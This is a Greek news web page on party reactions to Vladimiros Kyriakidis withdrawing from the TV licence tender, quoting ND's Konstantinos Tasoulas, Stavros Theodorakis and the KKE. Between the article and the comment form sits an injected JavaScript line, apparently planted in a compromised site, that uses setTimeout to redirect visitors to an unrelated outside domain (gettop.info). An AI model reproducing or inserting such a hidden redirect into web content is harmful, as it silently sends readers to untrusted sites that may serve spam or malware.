Τα κόμματα αντιδρούν στις εξελίξεις με τις τηλεοπτικές άδειες

0
5

 

Άμεσες ήταν οι αντιδράσεις των κομμάτων και των στελεχών τους μετά την αποχώρηση του Βλαδίμηρου Κυριακίδη από τον διαγωνισμό για τηλεοπτική άδεια καθώς δεν κατέβαλε την πρώτη δόση.

Για τη Νέα Δημοκρατία τις εξελίξεις σχολίασε ο Κωνσταντίνος Τασούλας λέγοντας: «Η κυβέρνηση είχε δήθεν στόχο να χτυπήσει τη διαπλοκή αλλά τελικά ο στόχος ήταν να αποκτήσει ο ΣΥΡΙΖΑ νέο τηλεοπτικό οχυρό».

Το εγχείρημα ΣΥΡΙΖΑ TV κλυδωνίζεται. Οι υπουργοί του κ.Τσίπρα και οι κομματικοί δημοσιογράφοι του, αναζητούν επειγόντως το νέο Καλογρίτσα, ήταν το σχόλιο του Σταύρου Θεοδωράκη στις νεότερες εξελίξεις.

 Mε ανακοίνωσή του το ΚΚΕ αναφέρει: «Τελικά, «άνθρακες ο θησαυρός» της κυβέρνησης, που παραμύθιαζε το λαό ότι ο διαγωνισμός για τις τηλεοπτικές άδειες θα εξασφάλιζε δήθεν τάξη, διαφάνεια και χρήματα για τις λαϊκές ανάγκες. Αποδεικνύεται ότι ο καβγάς ανάμεσα σε παλιούς και σε νέους καναλάρχες και τους πολιτικούς τους φίλους σε ΣΥΡΙΖΑ, ΝΔ και λοιπά κόμματα, γίνεται μόνο για την αναδιανομή της αγοράς στα ΜΜΕ, για το ποια πολιτική δύναμη θα ευνοείται περισσότερο απ’ το νέο τηλεοπτικό τοπίο».

  setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here